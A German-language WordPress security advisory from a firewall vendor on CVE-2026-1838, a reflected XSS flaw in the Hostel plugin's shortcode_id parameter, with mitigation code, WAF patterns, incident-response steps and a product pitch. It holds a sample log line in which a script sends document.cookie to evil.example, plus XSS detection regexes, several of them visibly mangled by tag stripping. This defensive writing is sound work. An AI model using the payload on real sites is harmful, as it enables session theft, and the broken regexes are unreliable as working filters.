Bewertung von XSS-Sicherheitsanfälligkeiten im WordPress Hostel Plugin//Veröffentlicht am 2026-04-20//CVE-2026-1838

WP-FIREWALL-SICHERHEITSTEAM

WordPress Hostel Plugin CVE-2026-1838

Plugin-Name WordPress Hostel Plugin
Art der Schwachstelle Cross-Site-Scripting (XSS)
CVE-Nummer CVE-2026-1838
Dringlichkeit Medium
CVE-Veröffentlichungsdatum 2026-04-20
Quell-URL CVE-2026-1838

Dringend: Reflektiertes XSS im WordPress ‘Hostel’ Plugin (≤ 1.1.6) — Was Webseitenbetreiber jetzt tun müssen

Veröffentlicht am: 2026-04-20
Vom WP-Firewall-Sicherheitsteam

Stichworte: WordPress, Schwachstelle, XSS, WAF, Vorfallreaktion

Zusammenfassung: Eine reflektierte Cross-Site Scripting (XSS) Schwachstelle (CVE-2026-1838) wurde im “Hostel” WordPress Plugin offengelegt, das Versionen bis einschließlich 1.1.6 betrifft. Das Problem ist in Version 1.1.7 gepatcht. Die Schwachstelle ist ohne Authentifizierung über die shortcode_id Parameter ausnutzbar und hat einen CVSS-Wert von 7.1. Dieser Beitrag erklärt das Risiko, wie Angreifer es nutzen können, wie man eine Ausnutzung erkennt und praktische, priorisierte Minderungsschritte — einschließlich verwalteter WAF-Regeln und einem temporären PHP-Härtungsschnipsel, den Sie sofort anwenden können.

Warum das wichtig ist (Kurzfassung)

  • Schwachstelle: Reflektiertes Cross-Site Scripting (XSS) über shortcode_id.
  • Betroffen: Hostel Plugin Versionen ≤ 1.1.6.
  • Gepatcht in: 1.1.7 — sofort aktualisieren.
  • CVE: CVE-2026-1838 (CVSS 7.1).
  • Erforderliche Berechtigung: Keine (nicht authentifiziert).
  • Die Ausnutzung erfordert Benutzerinteraktion (z. B. Besuch einer manipulierten URL oder Klicken auf einen bösartigen Link).
  • Auswirkungen: Sitzungsdiebstahl, Inhaltsinjektion, Phishing, SEO-Spam, Malware-Weiterleitungen und weitere Ausnutzungen, wenn sie mit anderen Fehlern kombiniert werden.

Als Betreiber und Verteidiger von WordPress-Seiten müssen Sie reflektiertes XSS in einem öffentlichen Plugin als ein Risiko mit hoher Wahrscheinlichkeit und hohem Einfluss behandeln, da Angreifer es in großem Maßstab mit Social Engineering oder Drive-by-Links waffenfähig machen können.

Die Schwachstelle — technische Zusammenfassung

Reflektiertes XSS entsteht, wenn ein Eingabewert, der von einem Besucher bereitgestellt wird, ohne ordnungsgemäße Bereinigung oder Escaping in die HTML-Ausgabe einer Seite integriert wird. In diesem Fall akzeptiert das Plugin einen shortcode_id Parameter, der verwendet wird, um Inhalte darzustellen (wahrscheinlich über einen Shortcode-Handler), aber diesen Parameter vor der Ausgabe nicht escaped oder gefiltert. Ein Angreifer erstellt eine URL oder eine Seite, die eine bösartige Nutzlast in shortcode_id. Wenn ein Opfer diese URL lädt oder dem bösartigen Link folgt, wird das Skript in shortcode_id wird im Browser des Opfers im Kontext der verwundbaren Seite ausgeführt.

Schlüsselmerkmale:

  • Reflektiertes XSS — Payload wird sofort in der Antwort reflektiert.
  • Unauthentifiziert — kein Login erforderlich, um den Fehler auszulösen.
  • Benutzerinteraktion erforderlich — der Angreifer muss jemanden (Besucher / Administrator / Redakteur) dazu bringen, den bösartigen Link zu öffnen oder eine Seite zu besuchen, die ihn enthält.
  • Typische Folgen: Diebstahl von Sitzungscookies (wenn die Seite Cookies ohne HttpOnly verwendet oder wenn ein Angreifer zum Diebstahl von Cookies über ein Skript wechselt), Übernahme von Konten durch exponierte Tokens, Inhaltsänderung, unsichtbare Weiterleitungen und Persistenz, wenn kombiniert mit gespeichertem XSS oder anderen beschreibbaren Abschnitten.

Beispielausnutzung (konzeptionell)

Der genaue serverseitige Handler wird je nach Implementierung unterschiedlich sein, aber ein generisches Beispiel für reflektiertes XSS sieht so aus:

  1. Angreifer erstellt diese URL:
    • https://example.com/some-page/?shortcode_id=<script></script>
    • (URL encoded: shortcode_id=scriptalertXSSscript)
  2. Das Opfer klickt auf den Link oder besucht die Seite.
  3. Das Plugin gibt den Wert von shortcode_id in die Seite aus, ohne zu escapen. Der Browser führt das injizierte Skript innerhalb des Seitenursprungs aus, was typische XSS-Folgen ermöglicht.

Angreifer werden realistischere Payloads verwenden als <script></script> — zum Beispiel das Erstellen unsichtbarer Iframes, das Exfiltrieren von Cookies zu einem Remote-Server oder das Injizieren eines Skripts, das AJAX-Aufrufe ausführt, um Aktionen im Namen des Benutzers durchzuführen.

Szenarien für reale Auswirkungen

  • Diebstahl von Sitzungscookies oder Authentifizierungstokens zur Übernahme von Konten (insbesondere wenn Cookies nicht HttpOnly sind oder wenn der Angreifer eskalieren kann).
  • Phishing: Injizieren eines gefälschten Admin-Login-Overlays, um Anmeldeinformationen zu erfassen.
  • Verunstaltung oder Einfügung von SEO-Spam / Kryptowährungs-Miner-Skripten.
  • Erstellen von Weiterleitungen zu Malware- oder Adware-Seiten, die zur Bereitstellung von Malware auf den Geräten der Besucher führen können.
  • In Multi-Site- oder Hochprivilegien-Szenarien könnten Angreifer administrative Aktionen über gefälschte Anfragen im Browser des Opfers auslösen.

Da dies unauthentifiziert und leicht über Social Engineering auszulösen ist, ist die Angriffsfläche groß.

Sofortige Schritte, die Sie unternehmen müssen (geordnet)

  1. Aktualisieren Sie das Plugin auf Version 1.1.7 oder höher (den Patch). Dies ist die einzige vollständige Lösung. Wenn Sie jetzt aktualisieren können, tun Sie es sofort.
  2. Wenn Sie nicht sofort aktualisieren können, wenden Sie eine Notfallminderung an:
    • Deaktivieren Sie den anfälligen Shortcode oder das Plugin vorübergehend.
    • Wenden Sie einen virtuellen Patch (WAF-Regel) an, um gängige XSS-Muster zu blockieren in shortcode_id.
  3. Sicherheitsmaßnahmen, die Sie jetzt sofort anwenden können (sogar vor einem Plugin-Update):
    • Fügen Sie einen Ausgabefilter zur Escape-Filterung um den Shortcode-Handler des Plugins hinzu (siehe PHP-Snippet unten).
    • Implementieren oder aktivieren Sie eine WAF und schalten Sie Regeln ein, um reflektierte XSS-Vektoren zu blockieren.
    • Erzwingen Sie Sicherheitsheader (Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, Referrer-Policy).
    • Begrenzen Sie die Exposition: Reduzieren Sie Berechtigungen, beschränken Sie Admin-Seiten nach IP und blockieren Sie verdächtige Anfragen.
  4. Überwachen Sie Protokolle und scannen Sie nach Anzeichen von Kompromittierungen (IoCs). Siehe Abschnitt zur Erkennung unten.

Schnelle PHP-Lösung (auf die functions.php des Themes oder ein kleines, spezifisches Plugin anwenden)

Dies ist eine vorübergehende defensive Änderung, um sicherzustellen, dass jeder Wert, der über shortcode_id hereinkommt, vor der Ausgabe bereinigt wird. Es ersetzt nicht das Aktualisieren des Plugins – behandeln Sie es als Notfalllösung.

Notiz: Der genaue Shortcode-Name im Hostel-Plugin kann abweichen. Ersetzen Sie ‘hostel_shortcode’ durch das tatsächliche Shortcode-Tag, das vom Plugin verwendet wird, falls bekannt.

// Quick temporary hardening for reflected 'shortcode_id' parameter.
// Add to your child theme's functions.php or a site-specific plugin.

add_filter('do_shortcode_tag', 'wpf_hardening_hostel_shortcode', 10, 3);
function wpf_hardening_hostel_shortcode($output, $tag, $attr) {
    // Only act on the plugin shortcode
    if ( strtolower($tag) !== 'hostel' ) {
        return $output;
    }

    // If shortcode_id exists in GET/POST/ATTR, sanitize it to neutralize scripts
    if ( isset($_GET['shortcode_id']) ) {
        $_GET['shortcode_id'] = wp_kses( wp_unslash( $_GET['shortcode_id'] ), array() );
    }

    if ( isset($_POST['shortcode_id']) ) {
        $_POST['shortcode_id'] = wp_kses( wp_unslash( $_POST['shortcode_id'] ), array() );
    }

    // If attribute is supplied to shortcode, sanitize it as well
    if ( isset($attr['shortcode_id']) ) {
        $attr['shortcode_id'] = sanitize_text_field( $attr['shortcode_id'] );
        // Rebuild output safely — prefer escaping on output rather than trusting plugin output
        // If plugin returns output in $output, make sure it's escaped
        $output = esc_html( $output );
    }

    return $output;
}

Dieses Snippet erzwingt eine starke Bereinigung für eingehende shortcode_id Werte. Es kann das Verhalten des Plugins beeinträchtigen, wenn das Plugin HTML in diesem Parameter erwartet; es ist als Notfallmaßnahme gedacht, bis das Plugin aktualisiert werden kann.

WAF / Strategien für virtuelle Patches

Wenn Sie eine Web Application Firewall (WAF) haben – verwaltet oder pluginbasiert – können Sie virtuelles Patchen implementieren, um Exploit-Versuche sofort zu blockieren. Eine richtig abgestimmte WAF stoppt den Angriff, ohne den Plugin-Code zu ändern oder die Funktionalität zu verlieren.

Vorgeschlagene Erkennungs- und Blockierungsmuster (generische Ideen; sorgfältig abstimmen, um falsche Positivmeldungen zu vermeiden):

  • Blockieren Sie Anfragen, bei denen shortcode_id enthält Skript-Tags:
    • Muster: (?i)(|<)\s*script\b
  • Blockiere Inline-Ereignis-Handler-Attribute, die in Parametern übergeben werden (onerror=, onload=):
    • Muster: (?i)on\w+\s*=
  • Blockiere javascript: Pseudo-URLs:
    • Muster: (?i)javascript\s*:
  • Blockiere VN: gängige SVG/XSS-Payloads wie <svg onload=...:
    • Muster: (?i)(|]*on\w+\s*=

Beispiel ModSecurity-Regel (konzeptionell):

# Block reflected XSS attempts in shortcode_id parameter
SecRule ARGS:shortcode_id "@rx (?i)(|<)\s*(script|svg|iframe|object|embed)\b" \
 "id:1001001,rev:1,phase:2,deny,log,msg:'Reflected XSS attempt in shortcode_id parameter'"

Generische WAF-Reguläre Ausdrücke zum Blockieren kodierter Payloads:

  • Regex: (?i)(\s*script|<\s*script|svg|<svg|onerror=|onload=|javascript:)

Anmerkungen:

  • Vermeide zu breite Regeln, die legitime Verwendungen von HTML-Eingaben unterbrechen, wenn deine Seite dies erfordert.
  • Wo möglich, setze die Regel nur für die Endpunkte durch, die die Shortcodes des Plugins rendern.
  • Blockiere Anfragen, die verdächtige kodierte Payloads enthalten (URL-kodiert <script> oft verwendet, um naive Filter zu umgehen).
  • Protokolliere blockierte Anfragen mit Headern und vollständigen Anfrageinhalten zur Vorfalluntersuchung.

Wenn du einen verwalteten WP-Firewall-Service (Plugin oder Hosting-bereitgestellt) verwendest, stelle sicher, dass die Schutzmaßnahmen Folgendes umfassen:

  • Regel, die speziell auf shortcode_id Parameter.
  • Blockierung von kodierten Skript-Tags und Ereignis-Handlern abzielt.
  • WAF-Signaturen, die auf moderne XSS-Payload-Formen abgestimmt sind (Daten-URIs, JS-Pseudo-Protokolle, obfuskierten Payloads).

Erkennung: Indikatoren und Protokolle

Suchen Sie nach:

  • Anfragen mit Parametern, die enthalten script, Javascript:, <svg onload=, onerror=, usw.
  • Ungewöhnliche Abfragezeichenfolgen in Zugriffsprotokollen, die sich auf shortcode_id.
  • Anomale POST-Anfragen an Seiten beziehen, die Shortcodes rendern.
  • Neue oder unerwartete Inhalte auf Seiten (versteckte Links, unsichtbare iframes, injizierte Skripte).
  • Erhöhte 200-Antworten auf bösartige Payloads (ein Angreifer wird testen, bis die Payload reflektiert und ausgeführt wird).

Wo man nachsehen kann:

  • Zugriffsprotokolle des Webservers (Apache/Nginx).
  • WAF-Protokolle (blockierte/erlaubte Anfragen).
  • CMS-Aktivitätsprotokolle (jüngste Änderungen an Seiten/Beiträgen).
  • Änderungen im Dateisystem (neue PHP-Dateien, modifizierte Vorlagen).
  • Datenbankinhalt (post_content-Felder, die injizierte Skripte oder iframes enthalten).
  • Analysen für ungewöhnliche ausgehende Weiterleitungen oder Rückgänge im Benutzerengagement.

Beispiele für verdächtige Protokolleinträge:

GET /some-page/?shortcode_id=scriptfetch(https://evil.example/pc+document.cookie)script HTTP/1.1
POST /contact/ HTTP/1.1
 Host: example.com
 Content-Type: application/x-www-form-urlencoded
 body: name=…&shortcode_id=svgonload...

Alle derartigen Treffer sollten als potenziell bösartig behandelt und untersucht werden.

Wenn Sie vermuten, dass Sie ausgenutzt wurden – sofortige Incident-Response

  1. Isolieren:
    • Versetzen Sie die Seite in den Wartungsmodus (oder nehmen Sie sie offline, wenn es schwerwiegend ist).
    • Blockieren Sie bekannte bösartige IP-Adressen oder schränken Sie den Zugriff auf Admin-Seiten vorübergehend nach IP ein.
  2. Beweise sichern:
    • Erstellen Sie Schnappschüsse der Zugriffsprotokolle, WAF-Protokolle, des Server-Dateisystems und der Datenbank-Exporte.
    • Vermeiden Sie das Überschreiben von Protokollen; kopieren Sie sie zur Analyse.
  3. Bereinigen:
    • Aktualisieren Sie das Plugin auf 1.1.7 (oder entfernen Sie das Plugin) und aktualisieren Sie WordPress sowie alle anderen Plugins/Themes auf die neuesten Versionen.
    • Führen Sie einen vollständigen Malware-Scan und eine Überprüfung der Dateiintegrität durch.
    • Suchen Sie nach Web-Shells, hinzugefügten Admin-Benutzern, modifizierten Kern-Dateien und verdächtigen geplanten Aufgaben.
    • Stellen Sie bei Bedarf aus einem sauberen Backup wieder her.
  4. Wiederherstellen und absichern:
    • Rotieren Sie alle Admin-Passwörter und API-Schlüssel.
    • Setzen Sie die WordPress-Salze und -Geheimnisse (in wp-config.php) zurück.
    • Widerrufen und erneuern Sie alle kompromittierten Schlüssel.
    • Scannen Sie nach der Bereinigung erneut und überwachen Sie auf eine erneute Infektion.
  5. Nach dem Vorfall:
    • Führen Sie eine Ursachenanalyse durch: Wie ist der Angreifer eingedrungen, wurde XSS genutzt, um weitere Aktionen durchzuführen, wurden Anmeldeinformationen gefischt?
    • Dokumentieren und verbessern Sie die Reaktionspläne für Vorfälle.

Langfristige Sicherheitskontrollen und Empfehlungen

  • Durchsetzen des Modells der geringsten Privilegien: Beschränken Sie Benutzerrollen auf das, was jede Person benötigt.
  • Wenden Sie Eingangsvalidierung und Ausgangsescapierung in allen von Ihnen kontrollierten Codes an (verwenden Sie esc_html(), esc_attr(), wp_kses(), und vorbereitete Anweisungen für DB-Abfragen).
  • Verwenden Sie eine Content Security Policy (CSP), um die Auswirkungen von injizierten Skripten zu reduzieren.
    • Eine strenge CSP wie default-src 'self'; script-src 'self' 'nonce-...'; hilft, erfordert jedoch eine sorgfältige Bereitstellung.
  • Aktivieren Sie HttpOnly- und Secure-Flags für Cookies; berücksichtigen Sie SameSite-Cookie-Attribute, um CSRF-Risiken zu reduzieren.
  • Halten Sie eine Richtlinie zur Plugin-Aktualisierung ein: Wenden Sie Sicherheitsupdates umgehend an und testen Sie in der Staging-Umgebung.
  • Implementieren Sie WAF-Schutzmaßnahmen mit virtuellen Patches, um Zeit zu gewinnen, wenn Patches verzögert werden.
  • Planen Sie regelmäßige Schwachstellenscans, Datei-Integritätsüberwachung und Backups.
  • Verwenden Sie die Multi-Faktor-Authentifizierung (MFA) für alle Administratorkonten.

Empfohlene WAF-Signaturen und -Anpassungen (praktische Beispiele)

Im Folgenden finden Sie Beispiel-Signaturideen, die Sie in Ihrer Firewall implementieren oder Ihrem Hosting-Anbieter übergeben können. Diese sind illustrativ und müssen an Ihre Umgebung angepasst werden, um Fehlalarme zu vermeiden.

  1. Blockieren Sie codierte Skript-Tags in beliebigen Parametern:
    • Regex: (?i)(|<)\s*script\b
    • Aktion: Blockieren und protokollieren.
  2. Blockieren Sie Ereignis-Handler-Attribute, die häufig für XSS verwendet werden:
    • Regex: (?i)on[a-z]{2,12}\s*=
    • Aktion: Nur in der Abfragezeichenfolge und in POST-Inhalten blockieren.
  3. Blockieren Sie JavaScript-Pseudo-Protokolle:
    • Regex: (?i)javascript\s*:
  4. Blockieren Sie verdächtige SVG/iframe-Attribute:
    • Regex: (?i)(|]*on\w+\s*=
  5. Regel einschränken auf shortcode_id Parameter:
    • Überprüfen Sie ARGS:shortcode_id für die obigen Regex; blockieren, wenn übereinstimmend.
  6. Rate-Limit / drosseln Sie verdächtige Anfragen:
    • Wenn eine IP mehrere blockierte Versuche auslöst, drosseln oder blockieren Sie die IP.
  7. Protokollieren Sie die gesamte rohe Anfrage für jedes blockierte Ereignis, damit Sie die Payloads analysieren können.

Stellen Sie sicher, dass Ihre Regeln während Phase 2 (Verarbeitung des Anfrageinhalts) angewendet werden, um POSTs und große Abfragezeichenfolgen zu überprüfen.

Content Security Policy (CSP) — ein praktischer Vorschlag

Eine CSP kann das Risiko verringern, selbst wenn XSS auftritt. Beginnen Sie mit einer Berichtspolitik und setzen Sie diese schrittweise durch:

  1. Nur-Bericht (Überwachung):
    Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self'; report-uri https://example.com/csp-report-endpoint
  2. Wechseln Sie zu einer durchgesetzten Richtlinie, sobald Sie legitime Inline-Skripte gelöst haben:
    Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example; object-src 'none'; base-uri 'self'; frame-ancestors 'none';

Denken Sie daran, dass CSP die Funktionalität beeinträchtigen kann, wenn Ihre Website auf Inline-Skripte angewiesen ist. Verwenden Sie Nonces oder Hashes für erlaubte Inline-Skripte, falls erforderlich.

Warum verwaltetes virtuelles Patchen wichtig ist

Wenn ein Zero-Day- oder bekanntes anfälliges Plugin nicht sofort aktualisiert werden kann (z. B. aufgrund von Staging-/Kompatibilitätstests oder Unterstützungslücken des Anbieters), schützt das virtuelle Patchen über ein WAF Ihre Website, während Sie die Behebung abschließen. Virtuelles Patchen ist kein Ersatz für die Aktualisierung des Codes, aber es ist eine effektive Übergangslösung:

  • Blockiert Exploit-Versuche am Rand.
  • Kauft Zeit für sichere Updates und Tests.
  • Kann zentral über viele Websites angewendet werden, wenn Sie mehrere WordPress-Installationen verwalten.

Wenn Sie sich entscheiden, einen Perimeterschutz zu verwenden, wählen Sie eine Lösung, die:

  • Benutzerdefinierte Parameterregeln zulässt (damit Sie gezielt anvisieren können). shortcode_id).
  • Sowohl kodierte als auch dekodierte Payload-Abgleiche unterstützt.
  • Blockierte Payloads mit vollem Anfrage-/Antwortkontext für forensische Zwecke protokolliert.

Vorgeschlagene Reaktionscheckliste (kurz)

  • Aktualisieren Sie das Hostel-Plugin auf 1.1.7.
  • Wenn nicht verfügbar, deaktivieren Sie das Plugin oder den Shortcode sofort.
  • Implementieren Sie WAF-Regeln, die Skriptmuster blockieren in shortcode_id.
  • Scannen Sie die Website nach injizierten Skripten und Web-Shells.
  • Rotieren Sie alle Anmeldeinformationen und Geheimnisse.
  • Wenden Sie CSP und Sicherheitsheader an.
  • Überwachen Sie Protokolle auf IoCs und blockierte Payloads.
  • Stellen Sie bei Bedarf aus einem sauberen Backup wieder her.

Beispielindikatoren für Kompromittierungen (IoCs)

  • Anfragen in Serverprotokollen, die enthalten shortcode_id=script oder shortcode_id=<svg onload=
  • Unerwartete Änderungen am post_content (in der WP-Datenbank), einschließlich injizierter <script> oder <iframe> Schlagworte
  • Neue Administratorbenutzer ohne Autorisierung erstellt
  • Unbekannte geplante Aufgaben (Cron-Jobs) in der Datenbank
  • Ausgehende Netzwerkverbindungen zu verdächtigen Domains nach gemeldeten Exploit-Versuchen

Wenn Sie eines davon finden, behandeln Sie es als ernst und folgen Sie den oben genannten Schritten zur Incident-Response.

Melden Sie sich noch heute für den kostenlosen WP‑Firewall-Plan an

Titel: Schützen Sie Ihre Website sofort mit WP‑Firewall (Kostenloser Plan)

Wenn Sie eine WordPress-Website verwalten, warten Sie nicht, um eine Verteidigungsschicht hinzuzufügen. Der Basisplan von WP‑Firewall (Kostenlos) bietet Ihnen sofortigen Schutz: eine verwaltete Firewall, unbegrenzte Bandbreite, eine regelbasierte WAF, Malware-Scans und Maßnahmen gegen OWASP Top 10-Risiken. Diese Kombination ist ideal, um reflektierte XSS-Versuche wie den oben beschriebenen zu neutralisieren, während Sie Plugin-Änderungen aktualisieren oder testen.

Beginnen Sie jetzt mit dem kostenlosen Plan

Upgrade jederzeit auf Standard oder Pro, wenn Sie automatisierte Bereinigungen, IP-Blacklists/Whitelists, virtuelles Patchen und erweiterte Berichterstattung benötigen.

Letzte Worte von WP‑Firewall-Experten

Ein reflektiertes XSS in einem weit verbreiteten Plugin ist ein klassisches Beispiel dafür, warum mehrschichtige Verteidigungen wichtig sind. Schnelles Patchen ist entscheidend, aber echte Sicherheit ergibt sich aus der Kombination von zeitnahen Updates mit Perimeterschutz, Überwachung und Bereitschaft für Vorfälle. Wenn Sie eine oder mehrere WordPress-Websites verwalten, betrachten Sie diesen Vorfall als Anstoß, Ihr Plugin-Inventar, die Automatisierung für Updates und die WAF-Abdeckung zu überprüfen.

Wenn Sie Hilfe bei der Implementierung des Notfall-PHP-Härtungs-Snippets, der Anpassung von WAF-Regeln für shortcode_id, oder der Durchführung eines forensischen Scans nach dem Vorfall benötigen, steht unser Team bereit, um zu helfen. Sie können Ihre Websites schnell mit dem kostenlosen WP‑Firewall-Plan sichern und später für automatisiertes virtuelles Patchen und tiefere Unterstützung bei Vorfällen upgraden.

Bleiben Sie sicher und patchen Sie umgehend.

— WP‐Firewall-Sicherheitsteam


wordpress security update banner

Erhalten Sie WP Security Weekly kostenlos 👋
Jetzt anmelden
!!

Melden Sie sich an, um jede Woche WordPress-Sicherheitsupdates in Ihrem Posteingang zu erhalten.

Wir spammen nicht! Lesen Sie unsere Datenschutzrichtlinie für weitere Informationen.